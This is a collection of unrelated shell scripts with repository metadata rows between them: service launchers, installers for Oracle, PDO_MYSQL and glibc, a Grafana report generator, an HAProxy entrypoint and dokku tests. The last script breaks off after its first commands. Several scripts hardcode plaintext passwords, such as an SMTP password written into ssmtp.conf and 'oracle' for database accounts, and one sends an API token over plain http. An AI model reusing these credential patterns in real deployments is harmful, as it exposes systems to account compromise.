if ! "$mandetorygroup" || ! "$mandetorypattern" || ! [ -d "$path" ]
then
if ! $mandetorygroup
then
echoerr "At least one group name must be given"
fi
if ! $mandetorypattern
then
echoerr "Exactly one permission pattern must be provided"
fi
if ! [ -d "$path" ] || [[ "$path" == '/' ]]
then
echoerr "A valid path must be given af the last argument"
fi
usage
exitError 1
fi
if [[ "$path" == '/' ]]
then
echoerr "'/' is not a valid path! do you want to destroy your system?"
exitError 1
fi
# Set the gihts for on the folders.
chmod $recursive g=rwx,o-rwx "$path"
for batchUser in $BATCHUSERS
do
setfacl $recursive -d -m u:$batchUser:r-x "$path"
setfacl $recursive -m u:$batchUser:r-x "$path"
done
setfacl $recursive -d -m g:sas:r-x "$path"
setfacl $recursive -m g:sas:r-x "$path"
for group in $groupnames;
do
# echo $group $path $pattern $recursive
setfacl $recursive -d -m g:$group:$pattern "$path"
if [ "$?" != 0 ]
then
echo "The error is most likely in the groupname."
echo "Failing: setfacl $recursive -d -s g:$group:$pattern \"$path\""
exitError 1
fi
setfacl $recursive -m g:$group:$pattern "$path"
done
popd > /dev/null
| true
|
fa5738f77b10cecf1e0de778dc651af5f6b26c1f
|
Shell
|
xxhank/ApplicationSupport
|
/install
|
UTF-8
| 674
| 3.65625
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
function pause(){
read -p "$*"
}
CURRENT=`dirname $0`
function link_to_home(){
NAME="$1"
SOURCE="$CURRENT/$NAME"
TARGET="$HOME/$2"
if [[ -e "$SOURCE" ]]; then
if [[ -e "$TARGET/$NAME" ]]; then
echo "\"$TARGET/$NAME\" aleady exist"
else
echo "\"$SOURCE\" -> \"$TARGET\""
ln -s "$SOURCE" "$TARGET"
fi
else
echo "$SOURCE not exist, please check"
fi
}
link_to_home "Sublime Text 3" "Library/Application Support"
link_to_home "Eudb_en" "Library"
link_to_home "WebStorm2016.1" "Preferences"
pause 'Press [Enter] key to continue...'
| true
|
d61f9cdb6d37f869ab857fbba0d144fac2e93971
|
Shell
|
PoplarYang/bash
|
/bash/tomcat_lite.sh
|
UTF-8
| 443
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
. /etc/init.d/functions
# chkconfig: - 85 15
# description: Tomcat
# tomcat安装目录
export CATALINA_HOME="/usr/local/tomcat"
case "$1" in
start)
if [ -f $CATALINA_HOME/bin/startup.sh ];then
echo $"Start Tomcat"
$CATALINA_HOME/bin/startup.sh
fi
;;
stop)
if [ -f $CATALINA_HOME/bin/shutdown.sh ];then
echo $"Stop Tomcat"
$CATALINA_HOME/bin/shutdown.sh
fi
;;
*)
echo $"Usage: $0 {start|stop}"
exit 1
;;
esac
| true
|
f5f723a00612f958d6a40258a728d89e184f542b
|
Shell
|
pushaas/pushaas-demo
|
/03-app-log.sh
|
UTF-8
| 562
| 3.078125
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
##################
# before
##################
. .utils.sh
printScriptPart
printItem "show your application logs"
printSubitem "errors are expected and will be solved when you create and bind a Push Service instance to your app"
waitEnter
##################
# do
##################
set -e
APP_NAME=$(appName)
tsuru app-log -a $APP_NAME -l 1000 | grep "checkEnv\|checkServices" | tail -n 8
##################
# after
##################
printUserPart
printItem "read the logs above (knowing that the errors are expected)"
printUserPartContinue
echo
| true
|
31d2dec197fe712fe08b1b7b4165223a6fee189d
|
Shell
|
lschellenberg/parityscripts
|
/pService.sh
|
UTF-8
| 286
| 3.5
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
if [ $# -eq 0 ]
then
echo "No arguments supplied"
exit 1
fi
case "$1" in
"start" ) sudo systemctl start parity;;
"reload" ) sudo systemctl daemon-reload;;
"stop" ) sudo systemctl stop parity;;
"status" ) sudo systemctl status parity.service;;
esac
| true
|
b2b5ebecb36567bc5aabb34d3e993fc8ae605d01
|
Shell
|
harshahota/autotest
|
/pass.sh
|
UTF-8
| 455
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
echo "......................................"
echo ".........the pass message............"
echo ".........the pass mail $1............"
echo "......................................"
echo "root=harshahota@gmail.com\nmailhub=smtp.gmail.com:587\nAuthUser=jenkinsupdates@gmail.com\nAuthPass=jenkinspassword\nUseTLS=YES\nUseSTARTTLS=YES\nFromLineOverride=YES" >> /etc/ssmtp/ssmtp.conf
zip -r report.zip target/report
echo "Test cases Passed" | mail -s "Pass Report" $1 -A report.zip
| true
|
a273cd004b0369302b22ff8dc04726d5a86f4ac5
|
Shell
|
paliwalvimal/sensu-grafana
|
/pdf-report-generator.sh
|
UTF-8
| 1,297
| 3.90625
| 4
|
[] |
no_license
|
#!/bin/bash
read -p "API Key: " API_KEY
read -p "Grafana Server [localhost]: " GRAFANA_SERVER
read -p "Dashboard ID (A - for all): " D_UID
if [[ -z ${D_UID} ]]; then echo "Required either Dashboard ID or A"; exit 1; fi
declare -l GRAFANA_ADDR=${GRAFANA_SERVER}
if [[ -z ${GRAFANA_ADDR} ]]; then GRAFANA_ADDR="localhost"; fi
if [[ ${D_UID} == 'a' || ${D_UID} == 'A' ]]; then
D_FOLDER=$(date +%F_%T)
mkdir ~/${D_FOLDER}
D_FOLDER=~/${D_FOLDER}
DASHBOARD_LIST=$(curl -s -H "Authorization: Bearer ${API_KEY}" ${GRAFANA_ADDR}:3000/api/search?type=dash-db | jq -r '.[] | @base64')
for DASHBOARD in $DASHBOARD_LIST
do
D_UID=$(echo ${DASHBOARD} | base64 --decode | jq -r '.uid')
D_TITLE=$(echo ${DASHBOARD} | base64 --decode | jq -r '.title')
echo "Generating report for ${D_TITLE}..."
curl -s -o "${D_FOLDER}/${D_TITLE}.pdf" http://${GRAFANA_ADDR}:8686/api/v5/report/${D_UID}?apitoken=${API_KEY}
sleep 5s
done
else
D_TITLE=$(curl -s -H "Authorization: Bearer ${API_KEY}" ${GRAFANA_ADDR}:3000/api/dashboards/uid/${D_UID} | jq -r '.dashboard.title')
D_FOLDER=~
echo "Generating report for ${D_TITLE}..."
curl -s -o "${D_FOLDER}/${D_TITLE}.pdf" http://${GRAFANA_ADDR}:8686/api/v5/report/${D_UID}?apitoken=${API_KEY}
fi
| true
|
6f1b262ed696ee5624099ee347f4cc2e82ac67d1
|
Shell
|
rickknowles-cognitant/search-bert
|
/launch.sh
|
UTF-8
| 358
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/sh
echo "Waiting 3 seconds for deployer interrupt ..."
sleep 3
echo "Looking for CONFIG_URL to download the config"
if [ ! -z $CONFIG_URL ]
then
echo "Found config url and downloading to sandbox"
mkdir -p /sandbox
git clone $CONFIG_URL /sandbox
else
echo "No config url supplied"
fi
echo "Starting ..."
gunicorn --bind 0.0.0.0:3000 wsgi:app
| true
|
d6b53daf16f610d4be2740ab0351b65dfeb3904f
|
Shell
|
ghoulmann/Psiphon-TKLPatch
|
/overlay/usr/lib/inithooks/bin/psiphon_cert.sh
|
UTF-8
| 416
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/sh
echo "####################################################"
echo "### Creating SSL certificate and key for Psiphon ###"
echo "####################################################"
#This prompts for domain name or IP address
openssl req -nodes -x509 -new -out /opt/psiphon/apache2/ssl/psiphon2.crt -keyout /opt/psiphon/apache2/ssl/psiphon2.key -days 365 -config /etc/psiphon/openssl.cnf -newkey rsa:2048
| true
|
6daea9fd359c306ab977ba3b2f41e22a3b06ce86
|
Shell
|
wolfbox/packages
|
/glibc/PKGBUILD
|
UTF-8
| 3,853
| 2.640625
| 3
|
[] |
no_license
|
_pkgbase=glibc
pkgname=glibc
pkgver=2.21
pkgrel=1
pkgdesc="The GNU libc"
arch=("x86_64")
url="http://www.gnu.org/s/libc/"
license=(GPL2 LGPL2.1)
options=('!strip' '!emptydirs')
depends=('linux' 'tzdata')
source=(ftp://ftp.gnu.org/gnu/libc/glibc-${pkgver}.tar.gz{,.sig}
glibc-2.10-dns-no-gethostbyname4.diff
glibc-2.21-roundup.patch
glibc.ldd.trace.through.dynamic.linker.diff
glibc.locale.no-archive.diff
glibc.nis-netgroups.diff
glibc.ru_RU.CP1251.diff
is_IS.diff
PKGBUILD.32)
sha256sums=('8d8f78058f2e9c7237700f76fe4e0ae500db31470290cd0b8a9739c0c8ce9738'
'SKIP'
'b1faf214be20843c851f912d5c2ca14c7c7184658ba3f24fb8ce579c6c67d1d4'
'167a7bd9bdef06285ff737cf4ae4b66c88e6be72bd9306f64bc0a394764d6237'
'9663b115474fd722d8f090a09a8ebbacfa19af3609437eae486a38edeccf2369'
'b2c6b0cd7f10d11cb5754b48eeaca705cef414c9dce64efaad0bba2472096f34'
'f45cb3f9982bc35bd6d6020db2834df3b5e509d6339416a9f37397ceb91db523'
'4bc95730d37f25a14b8259965abba249c2361da4bc28037408a8ac99fd98158e'
'6f47310a8f4d3727b4742fe385f9948e9da79a52602459c1517165de2488e48f'
'SKIP')
validpgpkeys=(F37CDAB708E65EA183FD1AF625EF0A436C2A4AFF) # Carlos O'Donell <carlos@systemhalted.org>
prepare() {
cd ${_pkgbase}-${pkgver}
# Use old-style locale directories rather than a single (and strangely
# formatted) /usr/lib/locale/locale-archive file:
patch -p1 -i "${srcdir}"/glibc.locale.no-archive.diff
# The is_IS locale is causing a strange error about the "echn" command
# not existing. This patch reverts is_IS to the version shipped in
# glibc-2.5:
patch -p1 -i "${srcdir}"/is_IS.diff
# Fix NIS netgroups:
patch -p1 -i "${srcdir}"/glibc.nis-netgroups.diff
# Support ru_RU.CP1251 locale:
patch -p1 -i "${srcdir}"/glibc.ru_RU.CP1251.diff
# Fix resolver problem with glibc-2.9:
patch -p0 -i "${srcdir}"/glibc-2.10-dns-no-gethostbyname4.diff
# Make it harder for people to trick ldd into running code:
patch -p1 -i "${srcdir}"/glibc.ldd.trace.through.dynamic.linker.diff
# From upstream, fix jump label
patch -p1 -i "${srcdir}"/glibc-2.21-roundup.patch
# Set some paths properly
echo slibdir=/usr/lib/${MULTIARCH} > configparms
echo rtlddir=/usr/lib/${MULTIARCH} >> configparms
echo sbindir=/usr/bin >> configparms
echo rootsbindir=/usr/bin >> configparms
}
build() {
cd ${_pkgbase}-${pkgver}
mkdir -p build
cd build
cp ../configparms ./
# Hardening flags don't play nicely with glibc
unset CPPFLAGS
export CFLAGS=-O3
export CXXFLAGS=-O3
../configure \
--prefix=/usr \
--libdir=/usr/lib/${MULTIARCH} \
--libexecdir=/usr/lib/${MULTIARCH} \
--sbindir=/usr/bin \
--enable-kernel=3.18 \
--with-headers=/usr/include \
--enable-add-ons \
--enable-obsolete-rpc \
--enable-profile \
--enable-stackguard-randomization \
--with-tls \
--with-__thread \
--without-cvs
make
}
package() {
cd ${_pkgbase}-${pkgver}/build
make install install_root="${pkgdir}"
make localedata/install-locales install_root="${pkgdir}"
# Install a link of ld-linux into /lib64 for compatibility
mkdir -p "${pkgdir}"/lib64
ln -s /usr/lib/${MULTIARCH}/ld-linux-${CARCH/_/-}.so.2 "${pkgdir}"/lib64
# Manually strip. Removing debugging symbols is safe and doesn't break valgrind
( cd "${pkgdir}"
find usr/lib/${MULTIARCH} | xargs file | grep "shared object" | grep ELF | cut -f 1 -d : | xargs strip -g
strip ${STRIP_STATIC} "${pkgdir}"/usr/lib/${MULTIARCH}/*.a
find usr/bin/ | xargs file | grep "executable" | grep ELF | cut -f 1 -d : | xargs strip ${STRIP_BINARIES} 2>/dev/null )
}
| true
|
b0da872447c7b7bfc9960b01c9525b4f4dcf313b
|
Shell
|
deepfence/ThreatMapper
|
/haproxy/router-entrypoint.sh
|
UTF-8
| 1,299
| 3.875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
cat /usr/local/etc/haproxy/deepfence.crt /usr/local/etc/haproxy/deepfence.key > /usr/local/etc/haproxy/deepfence.pem
# Override default cert files by copying user provided certificates for nginx (if present)
# the provided filenames should have .key and .crt extensions
CERTIFICATE_DIR="/etc/deepfence/certs"
if [[ -d ${CERTIFICATE_DIR} && -n "$(ls -i ${CERTIFICATE_DIR})" ]]; then
key=$(ls ${CERTIFICATE_DIR}/*.key 2>/dev/null)
crt=$(ls ${CERTIFICATE_DIR}/*.crt 2>/dev/null)
if [[ -n ${key} && -n ${crt} ]]; then
cat "${crt}" > /usr/local/etc/haproxy/deepfence.pem
echo \ >> /usr/local/etc/haproxy/deepfence.pem
cat "${key}" >> /usr/local/etc/haproxy/deepfence.pem
fi
fi
# first arg is `-f` or `--some-option`
if [[ "${1#-}" != "$1" ]]; then
set -- haproxy "$@"
fi
if [[ "$1" = 'haproxy' ]]; then
shift # "haproxy"
# if the user wants "haproxy", let's add a couple useful flags
# -W -- "master-worker mode" (similar to the old "haproxy-systemd-wrapper"; allows for reload via "SIGUSR2")
# -db -- disables background mode
# -q -- disables logging
set -- haproxy -W -db "$@"
fi
until curl -s "http://deepfence-server:8080/deepfence/ping" > /dev/null; do
echo "Waiting for containers to start up"
sleep 15
done
echo "Starting router"
exec "$@"
| true
|
fdbe26c7f93b751a16d40c93a62d6a82f9acb259
|
Shell
|
7208sagar/shellcriptprogram
|
/poweroftwo.sh
|
UTF-8
| 138
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
read -p "enter the Number :-" n
for (( i=0; i<n; i++ ))
do
powerOfTwo=$((2**$i))
echo $powerOfTwo
done
| true
|
11e508f9f8c81a32142569ec85de7b75bc72251d
|
Shell
|
mateiclaudiu/katas-agile-technical-practices
|
/scripts/refactor.sh
|
UTF-8
| 244
| 2.546875
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#this script runs all backend tests on each file change in the backend code
# requirement: brew install fswatch
scripts_dir="./scripts"
source_dir="./src"
fswatch -o -r "$source_dir" | xargs -n1 -I{} "$scripts_dir/tcr.sh"
| true
|
f028d5a858e9c3f00d5748813995d8fa8dba433f
|
Shell
|
lsds/sgx-lkl
|
/src/vicsetup/tests/verity/test-verity.sh
|
UTF-8
| 2,616
| 3.90625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
##==============================================================================
##
## Check usage:
##
##==============================================================================
if [ "$#" -gt 1 ]; then
echo "Usage: $0 <num-blocks>"
exit 1
fi
if [ "$#" == 1 ]; then
num_blocks=$1
else
num_blocks=256
fi
##==============================================================================
##
## Generate an image file with random data
##
##==============================================================================
rm -f verity verity.hash
dd if=/dev/urandom of=verity bs=4096 count=${num_blocks} 2> /dev/null
##==============================================================================
##
## Run "veritysetup format" action
##
##==============================================================================
if [ -z "${BLKSZ}" ]; then
BLKSZ=4096
fi
TMP=$(/bin/mktemp)
if ! veritysetup format --data-block-size="${BLKSZ}" --hash-block-size="${BLKSZ}" verity verity.hash > "${TMP}";
then
echo "$0: *** veritysetup failed"
exit 1
fi
root=$(grep "Root hash:" "${TMP}" | sed 's/Root hash:[\t ]*//g')
salt=$(grep "Salt:" "${TMP}" | sed 's/Salt:[\t ]*//g')
uuid=$(grep "UUID:" "${TMP}" | sed 's/UUID:[\t ]*//g')
#echo root=${root}
#echo uuid=${uuid}
##==============================================================================
##
## Run "vicsetup verityFormat" action
##
##==============================================================================
if ! vicsetup verityFormat --salt "${salt}" --uuid "${uuid}" --data-block-size="${BLKSZ}" --hash-block-size="${BLKSZ}" verity hashtree > /dev/null;
then
echo "$0: *** vicsetup hashtree failed"
exit 1
fi
##==============================================================================
##
## Verify that verity.hash and hashtree are idential
##
##==============================================================================
if ! cmp verity.hash hashtree;
then
echo "$0: *** hash tree comparison failed"
exit 1
fi
#rm -f verity verity.hash hashtree
echo "success"
##==============================================================================
##
## Attempt to open and close the verity device
##
##==============================================================================
dm_name=testverity
if ! vicsetup verityOpen verity "${dm_name}" hashtree "${root}";
then
echo "$0: *** vicsetup verityOpen failed"
exit 1
fi
TMP=$(/bin/mktemp)
dd if=/dev/mapper/"${dm_name}" of="${TMP}" > /dev/null 2> /dev/null
cmp "${TMP}" verity
rm "${TMP}"
vicsetup verityClose "${dm_name}"
| true
|
0019c0aabba8e751f34893d3d0daaf0332075301
|
Shell
|
Codebyme/AMH-Debian-Install
|
/OfficialModelScript/PDO_MYSQL-1.0.2/AMHScript
|
UTF-8
| 1,933
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin;
#info
function amh_module_info()
{
echo 'AMH-ModuleName: PDO_MYSQL-1.0.2';
echo 'AMH-ModuleDescription: PDO扩展为PHP访问数据库定义了一个轻量级的、一致性的接口,它提供了一个数据访问抽象层,这样,无论使用什么数据库,都可以通过一致的函数执行查询和获取数据。';
echo 'AMH-ModuleButton: 安装/卸载';
echo 'AMH-ModuleDate: 2013-1-31';
echo 'AMH-ModuleAdmin: ';
echo 'AMH-ModuleWebSite: http://amysql.com';
echo 'AMH-ModuleScriptBy: Amysql';
}
#install
function amh_module_install()
{
if amh_module_status ; then
exit;
else
cd /usr/local/;
wget http://code.amysql.com/files/PDO_MYSQL-1.0.2.tgz;
tar -zxvf PDO_MYSQL-1.0.2.tgz;
cd PDO_MYSQL-1.0.2;
/usr/local/php/bin/phpize;
./configure --with-php-config=/usr/local/php/bin/php-config -with-pdo-mysql=/usr/local/mysql/bin/mysql_config;
make && make install;
cat >> /etc/php.ini <<EOF
[pdo_mysql]
extension = /usr/local/php/lib/php/extensions/no-debug-non-zts-20090626/pdo_mysql.so
EOF
amh php reload;
amh_module_status;
fi;
}
#admin
function amh_module_admin()
{
if amh_module_status ; then
echo '[OK] PDO_MYSQL-1.0.2 No management options.';
else
exit;
fi;
}
#uninstall
function amh_module_uninstall()
{
if amh_module_status ; then
cd /usr/local/;
rm -rf PDO_MYSQL-1.0.2.tgz;
rm -rf PDO_MYSQL-1.0.2;
rm -rf /usr/local/php/lib/php/extensions/no-debug-non-zts-20090626/pdo_mysql.so;
sed -i "/pdo_mysql\.so/d" /etc/php.ini;
sed -i "/\[pdo_mysql]/d" /etc/php.ini;
amh php reload;
echo '[OK] PDO_MYSQL-1.0.2 Uninstall successful.';
else
exit;
fi;
}
#status
function amh_module_status()
{
if grep -q '\[pdo_mysql\]' /etc/php.ini; then
echo '[OK] PDO_MYSQL-1.0.2 is already installed.';
return 0;
else
echo '[Notice] PDO_MYSQL-1.0.2 is not installed.';
return 1;
fi;
}
| true
|
f73404208e29eb61de7226ea4928f9c0bd4dc3e3
|
Shell
|
zouppen/phasefulsplitter
|
/src/spawner
|
UTF-8
| 522
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/bash
#
# Spawn processors to multiple cores
# Usage: ./spawner command number_of_cpus target_dir
CMD=$1
MAXJOBS=$2
TARGET=$3
N=1
while read FILENAME; do
while true; do
JOBS=$(jobs -rp|wc -l)
if [[ $JOBS -lt $MAXJOBS ]]; then
echo spawning $FILENAME
echo "$FILENAME" >$TARGET/blob-$N.filename
$CMD $FILENAME $TARGET/blob-$N &
N=$(( $N + 1 ))
break
fi
sleep 5
done
done
echo "No more files in the queue. Waiting for the last ones."
wait
echo "All files are processed."
| true
|
3efef804a4bdd433ac79613debf1ce1170a710fc
|
Shell
|
WhatHai/document_database
|
/oracle-master/scripts/install_db.sh
|
UTF-8
| 2,367
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# author: BoobooWei
# Desc: 安装数据库
# User: Oracle
## 1. 根据模板配置创建参数文件
export ORACLE_SID=BOOBOO
mkdir -p $ORACLE_BASE/oradata/$ORACLE_SID
mkdir -p $ORACLE_BASE/admin/$ORACLE_SID/adump
mkdir -p $ORACLE_BASE/flash_recovery_area
grep -v '^#\|^$' $ORACLE_HOME/dbs/init.ora | sed "s/\(ORCL\|orcl\)/${ORACLE_SID}/;s/<ORACLE_BASE>/\$ORACLE_BASE/;s@ora_control1@\$ORACLE_BASE/oradata/${ORACLE_SID}/ora_control1.ctl@;s@ora_control2@\$ORACLE_BASE/oradata/${ORACLE_SID}/ora_control2.ctl@" > $ORACLE_HOME/dbs/init${ORACLE_SID}.ora
## 2. 创建口令文件
orapwd file=orapw$ORACLE_SID password=oracle entries=30
## 3. 创建pfile并启动到nomount状态
echo "create spfile from pfile" | sqlplus / as sysdba
echo "startup nomount" | sqlplus / as sysdba
## 4. 生成建库SQL
cat > createdb.sql << ENDF
CREATE DATABASE $ORACLE_SID
USER SYS IDENTIFIED BY oracle
USER SYSTEM IDENTIFIED BY oracle
LOGFILE GROUP 1 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo01a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo01b.log') SIZE 100M BLOCKSIZE 512,
GROUP 2 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo02a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo02b.log') SIZE 100M BLOCKSIZE 512,
GROUP 3 ('$ORACLE_BASE/oradata/$ORACLE_SID/redo03a.log','$ORACLE_BASE/oradata/$ORACLE_SID/redo03b.log') SIZE 100M BLOCKSIZE 512
MAXLOGFILES 5
MAXLOGMEMBERS 5
MAXLOGHISTORY 1
MAXDATAFILES 100
CHARACTER SET US7ASCII
NATIONAL CHARACTER SET AL16UTF16
EXTENT MANAGEMENT LOCAL
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/system01.dbf' SIZE 325M REUSE
SYSAUX DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/sysaux01.dbf' SIZE 325M REUSE
DEFAULT TABLESPACE users
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/users01.dbf'
SIZE 500M REUSE AUTOEXTEND ON MAXSIZE UNLIMITED
DEFAULT TEMPORARY TABLESPACE temp
TEMPFILE '$ORACLE_BASE/oradata/$ORACLE_SID/temp01.dbf'
SIZE 20M REUSE
UNDO TABLESPACE undotbs1
DATAFILE '$ORACLE_BASE/oradata/$ORACLE_SID/undotbs01.dbf'
SIZE 200M REUSE AUTOEXTEND ON MAXSIZE UNLIMITED;
ENDF
echo "@createdb.sql" | sqlplus / as sysdba
## 5. 执行生成数据字典信息的脚本并执行
cat > 1.sql << ENDF
@?/rdbms/admin/catalog.sql
@?/rdbms/admin/catproc.sql
conn system/oracle
@?/sqlplus/admin/pupbld.sql
ENDF
echo "@1.sql" | sqlplus / as sysdba
| true
|
916a4f7ed3938fe3ce8c16676ac877e2cc7d1ee5
|
Shell
|
bboyadao/shell
|
/newvps.sh
|
UTF-8
| 2,064
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
user="${whoami}"
echo $user
echo "Tiến hành setup trên vps mới"
echo "Cài đặt python3, nginx, uwsgi, postgresql..."
sudo su -c "ln -sf /bin/bash /bin/sh"
sudo su -c "apt-get update"
sudo su -c "apt-get -y install nginx python3 python3-pip python3-dev ufw build-essential python3.6-dev postgresql postgresql-contrib supervisor libpcre3 libpcre3-dev"
sudo su -c "apt-get install -y software-properties-common"
sudo su -c "add-apt-repository -y universe"
sudo su -c "add-apt-repository -y ppa:certbot/certbot"
sudo su -c "apt-get update"
sudo su -c "apt-get -y install python-certbot-nginx"
sudo su -c "pip3 install wheel setuptools --no-cache-dir"
sudo su -c "pip3 install uwsgi -I --no-cache-dir"
sudo su -c "pip3 install virtualenv virtualenvwrapper --no-cache-dir"
sudo su -c 'mkdir -p "/etc/uwsgi/sites"'
sudo su -c 'mkdir -p "/var/log/uwsgi"'
echo "export VIRTUALENVWRAPPER_PYTHON=/usr/bin/python3" >> ~/.bashrc
echo "export WORKON_HOME=~/virtualenvs" >> ~/.bashrc
echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bashrc
source ~/.bashrc
echo "copy file config";
sudo su -c ':> /etc/systemd/system/uwsgi.service';
content=$(< "/home/$USER/uwsgi.service");
# echo "${content/my_user/$USER}" | sudo tee '/etc/systemd/system/uwsgi.service'
echo """
[Unit]
Description=uWSGI Emperor service
[Service]
ExecStartPre=/bin/bash -c 'mkdir -p /run/uwsgi; chown $USER:www-data /run/uwsgi'
ExecStart=/usr/local/bin/uwsgi --emperor /etc/uwsgi/sites
Restart=always
KillSignal=SIGQUIT
Type=notify
NotifyAccess=all
[Install]
WantedBy=multi-user.target
""" | sudo tee '/etc/systemd/system/uwsgi.service'
sudo su -c ':> /etc/supervisor/conf.d/uwsgi.conf'
# sudo su -c "cat uwsgi.conf >> /etc/supervisor/conf.d/uwsgi.conf"
echo """
[program:uwsgi]
command=/usr/local/bin/uwsgi --emperor /etc/uwsgi/apps-enabled
autostart=true
autorestart=true
redirect_stderr=true
stopsignal=QUIT
stdout_logfile=/var/log/uwsgi.log
""" | sudo tee '/etc/supervisor/conf.d/uwsgi.conf'
sudo su -c 'supervisorctl reread'
sudo su -c 'sudo supervisorctl update'
| true
|
89cf6218e326e65bf42433f7df2beb34e17d0cee
|
Shell
|
guenther-brunthaler/usr-local-bin-xworld-jv3gwuidf2ezyr5vbqavqtxyh
|
/mkpairs
|
UTF-8
| 281
| 3.703125
| 4
|
[] |
no_license
|
#! /bin/sh
# Written in 2008 by Guenther Brunthaler.
# Create all possible pairs from input input lines, maintaining their order.
# The pairs will be separated by a tabulation character.
FIRST=
while IFS= read NEXT; do
test -n "$FIRST" && printf '%s\t%s\n' "$FIRST" "$NEXT"
FIRST=$NEXT
done
| true
|
ab5796ff441f639d8cb51a0701b1e7c81eb7f17d
|
Shell
|
DimuthuKasunWP/dokku
|
/tests/unit/20_storage.bats
|
UTF-8
| 1,137
| 2.828125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bats
load test_helper
setup() {
global_setup
create_app
}
teardown() {
destroy_app
global_teardown
}
@test "(storage) storage:mount, storage:list, storage:umount" {
run /bin/bash -c "dokku storage:mount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:list $TEST_APP | grep -qe '^\s*/tmp/mount:/mount'"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:mount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_output "Mount path already exists."
assert_failure
run /bin/bash -c "dokku storage:unmount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:list $TEST_APP | grep -vqe '^\s*/tmp/mount:/mount'"
echo "output: $output"
echo "status: $status"
assert_success
run /bin/bash -c "dokku storage:unmount $TEST_APP /tmp/mount:/mount"
echo "output: $output"
echo "status: $status"
assert_output "Mount path does not exist."
assert_failure
}
| true
|
257f2ddec571785e26c06edaa4d79f965b2daf2e
|
Shell
|
sounz/SOUNZ-Online
|
/sounz-1.62.0/postbuild.sh
|
UTF-8
| 895
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
###########################################################################
# Post-Build script executed after dpkg-buildpackage is invoked to
# create the package files.
# P Waite, Nov 2007
#
# This script can be put anywhere you like, but normally it lives in the
# top directory of your source package.
#
###########################################################################
# What this script is doing
# Insert your custom post-build processing here
#
# Some parameters available to you:
# $package your package name, from debian/control
# $package_ver debian version being built, from debian/changelog
# $packagesdir directory in which the package will be built
# $VCS path to VCS executable, eg: /usr/bin/svn
# $VCSTYPE type of VCS being used, eg: Vcs-Svn
#
# There are many others (see scripts), but those are the main ones.
#
# ENDS
| true
|
d26d7ddf0e1b71a48a99f432667801f8b6fe65ca
|
Shell
|
sywen-scut/MultiCoreSystem-simulator
|
/generator/trace_cpu/analysis/get_lest_line.sh
|
UTF-8
| 529
| 2.640625
| 3
|
[] |
no_license
|
for name in barnes blackscholes canneal dedup ferret fluidanimate freqmine raytrace streamcluster swaptions swaptions
do
for method in xy
do
dir=cpu_"$name"_"$method".txt
dir_out=last_line_"$name"_"$method".txt
echo $dir
echo $dir_out
if [ -f "./last_line/$dir_out" ]
then
rm ./last_line/$dir_out
fi
tail -n 1 ../$dir >> ./last_line/$dir_out
done
done
| true
|
5b818d9342f1b8cdeeee1d599be64d97d248f52b
|
Shell
|
moutsian/lm12_Scripts
|
/from_ibd_conditional/get_high_pcausal_vars.sh
|
UTF-8
| 584
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
shopt -s nullglob
head -n1 "/lustre/scratch113/projects/crohns/iibdgc_meta/results/finemap/12_68492980_CSQ.confset" > "/lustre/scratch115/teams/anderson/ibd_conditional/high_pcausal_CSQ.confset"
array3=(/lustre/scratch113/projects/crohns/iibdgc_meta/results/finemap/*CSQ*)
for i in ${array3[*]}
do
echo "$i\n"
cat ${i} | awk -v FILE="$i" '{split(FILE,arr,"/");split(arr[9],arr2,".");split(arr2[1],arr3,"_");if($3!="NA" && $3>=0.5){print arr3[1]"_"arr3[2]"\t"$0;}}'| grep -v "P_CUMSUM" >> "/lustre/scratch115/teams/anderson/ibd_conditional/high_pcausal_CSQ.confset"
done
| true
|
25d0c883e2a0dd5fa3e3e4828fba6dfd59a81f6b
|
Shell
|
logimic/shape
|
/buildMake.sh
|
UTF-8
| 602
| 3.421875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Script for building shape on Linux machine
project=shape
#expected build dir structure
buildexp=build/Unix_Makefiles
deploydir=deploy/Unix_Makefiles
currentdir=$PWD
builddir=./${buildexp}
mkdir -p ${builddir}
#get path to deploy
mkdir -p ${deploydir}
pushd ${deploydir}
deploydir=$PWD
popd
#launch cmake to generate build environment
pushd ${builddir}
cmake -G "Unix Makefiles" -DBUILD_TESTING:BOOL=true -DCMAKE_BUILD_TYPE=Debug -DSHAPE_DEPLOY:PATH=${deploydir} ${currentdir}
popd
#build from generated build environment
cmake --build ${builddir} --config Debug --target install
| true
|
bed10cfb6fb8dac0c8a838d23b35eb4ab89a2b29
|
Shell
|
ethanpasta/holberton-system_engineering-devops
|
/0x0C-web_server/4-not_found_page_404
|
UTF-8
| 640
| 2.71875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Script configures an Nginx 404 page
apt-get -y update
